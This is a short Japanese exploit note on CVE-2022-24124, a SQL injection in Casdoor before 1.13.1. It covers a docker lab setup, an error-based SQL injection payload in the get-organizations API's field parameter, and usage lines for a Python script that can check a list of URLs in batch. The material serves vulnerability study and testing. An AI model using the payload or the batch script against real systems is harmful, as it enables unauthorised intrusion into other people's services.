
CVE-2022-24124 エクスプロイト
Casdoorは、OAuth 2.0/OIDCに基づいた集中型シングルサインオン(SSO)認証プラットフォームです。
CVE番号:CVE-2022-24124
CNPD番号:CNPD-202201-7304
危険レベル:高 (7.5 HIGH)
POC/EXP:公開済み
Casdoor < Casdoor 1.13.1 //1.13.1より前のバージョンが影響を受けます
この脆弱性はSQLインジェクションの脆弱性であり、クエリAPIにおいて、フィールドおよび値パラメータに関連するSQLインジェクションが存在します。例として、api/get-organizations が挙げられます。
脆弱性イメージのプル
docker pull vulfocus/casdoor:1.13.0

脆弱性環境の起動
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

脆弱性環境のページを開く

POCを使用してペイロードを構築する
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

練習のためにPython版を作成し、さらにバッチ検出機能を追加しました。